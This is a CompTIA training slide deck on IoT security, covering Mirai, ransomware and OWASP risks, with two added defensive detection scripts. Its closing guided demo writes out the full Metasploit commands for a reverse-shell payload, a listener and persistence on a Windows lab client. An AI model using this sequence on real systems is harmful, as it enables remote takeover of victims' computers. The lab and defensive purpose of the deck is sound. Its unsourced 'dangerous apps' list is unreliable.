Protecting your Organisation from the
Internet of Evil Things
Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
The Voice of the World’s IT Industry and over 1.5 million IT Professionals
CERTIFICATIONS: Largest Provider of Vendor-Neutral IT Certifications
✓ Higher Salaries
✓ Growing Demand
✓ Verified Strengths
✓ Universal Skills
“Three of the ‘Top 10 Certifications That Help IT Workers Get Jobs’ are CompTIA certifications.”*
ASSOCIATION: 4,000+ IT Channel Providers & Partners
A non-profit trade association with more than 4,000 members and business partners. Our members drive our programs through their participation in CompTIA communities, research studies, events, sharing of best practices and more.
PHILANTHROPY: Creating IT Futures Foundation
A 501(c)(3) charitable organization that creates on-ramps for successful IT careers, serving individuals who are underrepresented in IT and lacking in opportunities to be successful in IT, including veterans, youth, and the unemployed.
ADVOCACY: Public Policy & Reform
Our advocacy division encourages collaboration and advancing of legislation that allows the private sector to develop new products and services, find solutions and sell them in the global marketplace.
* Source: The Dice Report, February 2012
Zeshan Sattar
From Cybernetics to Cybersecurity
2004
• BSc Cybernetics & Virtual Worlds
• IT Support Tech, UK & Japan
2007
• Systems Administrator
• Technical Trainer, Europe
2013
• IT Expert Consultant, Worldwide
• Head of Curriculum
2015
• Certification Evangelist
Agenda
▪ Introduction
▪ What is IoT?
▪ What is IoET?
▪ Examples of Cyber attacks
▪ Human error
▪ CompTIA certifications
▪ Guided Demo : Compromising a Windows client
What is the Internet of Things?
The Internet of things (IoT) is the inter-networking of physical devices, vehicles (also referred to as "connected devices" and "smart devices")
Which simply means…
Everything Has Become Connected
Smart Car
Smart Suit
Smart House
Tablet
Smart Phone
Desktop/Laptop
Smart Shoes
Internet CCTV
Smart Watch
Smart Cities
The Internet
What is the Internet of Things?
▪ The main problem is that because the idea of networking appliances and
other objects is relatively new, security has not always been considered in
product design.
▪ Consumers often fail to change the default passwords on smart devices or if
they do change them, fail to select sufficiently strong passwords.
The Concerns
▪ 70% of the most commonly used IoT devices contain vulnerabilities involving password security,
permissions and encryption
▪ A number of IoT devices available today have defaulted to the lowest hanging fruit for security &
authentication: passwords. Passwords are bad and a disaster for the web & IoT, for many reasons.
▪ Application-level security:
–Default admin passwords
–Weak passwords
–Not using encryption over the network
–Open ports.
▪ Protocol-level security:
–Wireless protocols such as ZigBee & Bluetooth
The Internet of Evil Things
What is the Internet of Evil Things?
▪ It is the Internet of Things but used in a negative way to hurt you.
▪ By detecting vulnerabilities, they can control your:
– Car, house, phone, computer
– Your identity can be stolen, You can be killed, You can be blackmailed
– You can end up in jail because of an attack that took place while you were
asleep
Examples of IoT devices
The accessible IoT devices
The Problems?
▪ Limited CPU on devices
▪ Encryption & identity keys
▪ New devices with new
OS/software
▪ Too much network traffic
▪ Wi-Fi connected home
appliances
▪ GUI & Internet Browsers
▪ Hardware Trojans
Cyber Attack Examples
What is Mirai?
▪ Mirai is the Japanese word for Future.
▪ In IT, it is malware that attacks out-of-date Linux devices remotely
▪ It controls the devices and turns them into a botnet for further attacks
▪ It scans the internet looking for IP addresses of IoT devices.
▪ Some of the popular websites affected were: GitHub, Twitter, Reddit,
Netflix, Airbnb
▪ BASHLITE is another malware that performs a DDoS Attack on Linux
Systems
More about Mirai
▪ On the 21st of October 2016, a Mirai-fueled zombie botnet army was
deployed on Dyn.
▪ Dyn is one of the world’s largest DNS providers
▪ The attack resulted in taking down internet access in many of America’s
largest cities.
▪ Mirai gave us a view on how the IoT can turn into an IoET by controlling
many devices and maybe shutting them down
Mirai – one year on…
▪ 66% of IT Pros said they either haven’t checked or don’t know how to
check their devices for Mirai
▪ 20% said their IoT devices were hit with ransomware attacks last year.
▪ 16% of respondents say they experienced man-in-the-middle attacks
through IoT devices.
▪ 23% of IT security professionals monitor connected devices coming into
their offices
Source: Pwnie Express
The Onion Routing (TOR)
▪ Onion routing is a technique for anonymous communication over a
computer network. In an onion network, messages are encapsulated in
layers of encryption, analogous to layers of an onion. ... When the final layer
is decrypted, the message arrives at its destination.
▪ Tor aims to conceal its users' identities and their online activity from
surveillance and traffic analysis by separating identification and routing.
▪ It is an implementation of onion routing, which encrypts and then randomly
bounces communications through a network of relays run by volunteers
around the globe
Ransomware
Steps to Ransomware
1. Infected file or Email link to a page
2. User redirected to Site
3. File Downloaded to the system
4. File Installed
5. User Data Encrypted
6. Pay or Pay
WannaCry
▪ WannaCry Ransomware
▪ One of the worst spread malware
▪ Developed by the NSA “Eternal Blue”
▪ Supposedly weaponized by North Korea
▪ This Ransomware is still spreading
Top 10 IoT Vulnerabilities
1. Insecure Web Interface
2. Insufficient Authentication/Authorization
3. Insecure Network Services
4. Lack of Transport Encryption/Integrity Verification
5. Privacy Concerns
6. Insecure Cloud Interface
7. Insecure Mobile Interface
8. Insufficient Security Configurability
9. Insecure Software/Firmware
10. Poor Physical Security
Source: OWASP
Shodan.io
Some Dangerous Apps
▪ Flashlight
▪ Tinder
▪ Snapchat
▪ Blendr
▪ Whisper
▪ Yik Yak
▪ Poof
▪ Omegle
▪ Clean it
▪ Deep Clean
▪ Flappy Cat
▪ Light VPN
▪ DU battery Saver & Fast Charge
▪ Lazy Listen audiobook
▪ Kik Messenger
▪ Whatsapp Bomber
▪ Quick Pic
▪ ES File Explorer
▪ UC Browser
▪ Dolphin Web Browser
▪ Clean Master
▪ Whale Camera
▪ Blinking Camera
▪ File Master
▪ Art Camera
Sample Malware / Virus Codes available on GitHub
(for Research)
Ransomware Code
Worm Code
Virus Code
Mirai Slice Code
Batch File Code
DoS Code
How would a HACKER use IoT against you?
Hacking Steps
Covering Tracks
Maintaining Access
Gaining Access
Scanning
Reconnaissance
To protect against a hacker, you have to think like a hacker
How would a HACKER use IoT against you?
▪ Blackmail
– What Happened?
▪ Identity Theft / 419 Scam
– Why do they need it?
▪ Phishing
– What info are they looking for?
▪ Health Reports
– What do they do with it?
Quick Tip
The Solutions?
▪ IoT security opens new gates for security professionals to develop security
solutions
▪ Network Security:
– How many devices transfer unencrypted data?
– What are these devices?
– Which are most active?
▪ User Security:
– Do you need that software?
– Is it trustable?
– Is it from the vendor?
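As an added example (not part of the original slides), the script below answers the three Network Security questions over a flow log and also flags the scanner-like behaviour from the Mirai slides: one device contacting many hosts on Telnet ports 23 and 2323. The CSV layout, the addresses, the port-to-protocol mapping and the threshold are constructed assumptions.

```python
import csv
import io
from collections import defaultdict

# Constructed sample flow log (not real traffic): src, dst, dst_port, bytes.
SAMPLE_FLOWS = """\
src,dst,dst_port,bytes
192.168.2.21,203.0.113.5,80,5200
192.168.2.21,203.0.113.5,80,4100
192.168.2.22,203.0.113.9,443,9000
192.168.2.23,198.51.100.7,1883,300
192.168.2.24,198.51.100.11,23,60
192.168.2.24,198.51.100.12,23,60
192.168.2.24,198.51.100.13,2323,60
192.168.2.24,198.51.100.14,23,60
192.168.2.25,192.168.2.1,23,800
"""

# Assumed mapping: ports whose usual protocol carries data unencrypted.
CLEARTEXT_PORTS = {21: "ftp", 23: "telnet", 80: "http", 1883: "mqtt", 2323: "telnet"}
TELNET_PORTS = {23, 2323}
FANOUT_THRESHOLD = 3  # assumed: distinct Telnet destinations before flagging


def parse_flows(text):
    """Return flow records with numeric port and byte fields."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        rows.append({"src": row["src"], "dst": row["dst"],
                     "port": int(row["dst_port"]), "bytes": int(row["bytes"])})
    return rows


def cleartext_devices(flows):
    """Which devices transfer unencrypted data, and over which protocols?"""
    seen = defaultdict(set)
    for f in flows:
        proto = CLEARTEXT_PORTS.get(f["port"])
        if proto:
            seen[f["src"]].add(proto)
    return {src: sorted(protos) for src, protos in seen.items()}


def most_active(flows, top=3):
    """Which devices are most active, ranked by total bytes sent?"""
    totals = defaultdict(int)
    for f in flows:
        totals[f["src"]] += f["bytes"]
    return sorted(totals.items(), key=lambda kv: (-kv[1], kv[0]))[:top]


def telnet_fanout(flows, threshold=FANOUT_THRESHOLD):
    """Devices contacting many distinct hosts on Telnet: scanner-like behaviour."""
    targets = defaultdict(set)
    for f in flows:
        if f["port"] in TELNET_PORTS:
            targets[f["src"]].add(f["dst"])
    return {src: len(dsts) for src, dsts in targets.items() if len(dsts) >= threshold}


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    print("Unencrypted senders:", cleartext_devices(flows))
    print("Most active:", most_active(flows))
    print("Telnet fan-out (check these devices first):", telnet_fanout(flows))
```

A single Telnet session to a local gateway (192.168.2.25 in the sample) is reported as unencrypted traffic but not as fan-out; only the device reaching several distinct hosts is flagged.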
IoT attacks in different sectors
[Chart: IoT by sector (Consumer, Commercial, Medical, Security Issues) for 2010, 2015 and 2020; vertical axis 0 to 100, labelled "Billions". Data labels as extracted, in order: 20.5, 20, 10.2, 20, 40.5, 40.4, 20.8, 60, 80, 60, 60, 90.3]
Top 5 Reasons for IoT attacks
1 Low security awareness
2 Weak Password Security
3 Careless handling of data
4 Inadequate software security
5 Ineffective data access management
End User awareness is critical
Ensuring our IT Professionals
are equipped with the right
skills
• DoS: A+, Network+, Security+, Linux+, CSA+
• Android: A+, Network+, Linux+, Security+, CASP
• SQL Injection: A+, Network+, Server+, Security+, Linux+
• Wi-Fi: Network+, Security+, CASP, Linux+
• Virus Attacks: A+, Network+, Security+, CSA+, CASP, Linux+
Guided Demo of an Attack
▪ How can you simulate this at home?
– Virtualization Software (Hyper-V, VMWare Player, Virtual Box)
– Kali Linux
– Windows client
– Tip: set up a Windows Server VM to provide DHCP to the virtual
network and use an isolated VM network
The attack performed here is for Demonstration, Awareness and Educational
purposes. Performing the same is at your own Risk.
Commands to the demo (1/3)
▪ On the Kali Linux VM, open a terminal window and type the following
command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.10 LPORT=4444 -f exe > exploit.exe
▪ This command creates the exploit.exe and stores it in the Home folder ready
for you to distribute to the victims (USB, email, web link etc.)
▪ The IP address is of your Kali VM
▪ Then launch Metasploit by typing the following command:
msfconsole
Commands to the demo (2/3)
▪ Now, we will configure the Kali VM to listen for the user to launch the
exploit, by typing:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.10
set LPORT 4444
exploit -j -z
▪ Your Kali VM is now ready for the attack to happen. On your Windows client,
double click the exploit.exe
▪ You will notice that the Kali VM receives the connection
Commands to the demo (3/3)
▪ We can now interact with the connecting machine by typing:
sessions -i 1
▪ We want to ensure that if the user logs off/restarts the machine, we can
reconnect. This can be done by adding persistence:
run persistence -U -i 5 -p 4444 -r 192.168.2.10
▪ We now have full control of the system and can carry out various commands.
The commands that you can use can be viewed by typing:
help
▪ Enjoy hacking!
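The defender's view of the demo above, as an added example that is not part of the original slides: a triage pass over Sysmon-style events from the lab's Windows client that correlates three traces per process (an executable started from a user-writable folder, an outbound connection to an unexpected port such as 4444, and a write under a Run key). The event records, the port allowlist and the alert threshold are constructed assumptions, and it is assumed that the persistence step shows up as a Run key write.

```python
from collections import defaultdict

# Constructed Sysmon-style events from the lab's Windows client. Field names
# follow Sysmon event IDs 1 (process create), 3 (network connection) and
# 13 (registry value set); every value below is made up for this example.
SAMPLE_EVENTS = [
    {"id": 1, "guid": "A1", "Image": r"C:\Users\lab\Downloads\exploit.exe"},
    {"id": 3, "guid": "A1", "DestinationIp": "192.168.2.10", "DestinationPort": 4444},
    {"id": 13, "guid": "A1",
     "TargetObject": r"HKU\S-1-5-21-0\Software\Microsoft\Windows\CurrentVersion\Run\demo",
     "Details": r"C:\Users\lab\AppData\Local\Temp\demo.vbs"},
    {"id": 1, "guid": "B2", "Image": r"C:\Program Files\Browser\browser.exe"},
    {"id": 3, "guid": "B2", "DestinationIp": "203.0.113.5", "DestinationPort": 443},
    {"id": 1, "guid": "C3", "Image": r"C:\Users\lab\Downloads\setup.exe"},
    {"id": 3, "guid": "C3", "DestinationIp": "203.0.113.8", "DestinationPort": 443},
]

USER_WRITABLE = ("\\downloads\\", "\\appdata\\", "\\desktop\\", "\\temp\\")
EXPECTED_PORTS = {53, 80, 443}        # assumed egress allowlist for the lab
RUN_KEY = "\\currentversion\\run\\"   # logon autostart location in the registry
ALERT_AT = 2                          # assumed: indicators needed to raise an alert


def indicators_for(event):
    """Map one event to zero or more indicator names."""
    found = []
    if event["id"] == 1:
        if any(part in event["Image"].lower() for part in USER_WRITABLE):
            found.append("started-from-user-writable-path")
    elif event["id"] == 3:
        if event["DestinationPort"] not in EXPECTED_PORTS:
            found.append("outbound-to-unexpected-port:%d" % event["DestinationPort"])
    elif event["id"] == 13:
        if RUN_KEY in event["TargetObject"].lower():
            found.append("run-key-write")
    return found


def triage(events, alert_at=ALERT_AT):
    """Group indicators per process GUID; return processes that reach alert_at."""
    per_process = defaultdict(list)
    for event in events:
        for name in indicators_for(event):
            if name not in per_process[event["guid"]]:
                per_process[event["guid"]].append(name)
    return {guid: names for guid, names in per_process.items()
            if len(names) >= alert_at}


if __name__ == "__main__":
    for guid, names in triage(SAMPLE_EVENTS).items():
        print("ALERT process %s: %s" % (guid, ", ".join(names)))
```

Requiring two indicators keeps an ordinary download that only talks to port 443 (process C3 in the sample) out of the alert list while the demo's process A1 trips all three.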
Any Questions?
Thank you for your time!
Zeshan Sattar
Let’s connect!
Twitter: @zeshandotcom
LinkedIn: https://www.linkedin.com/in/zeshandotcom/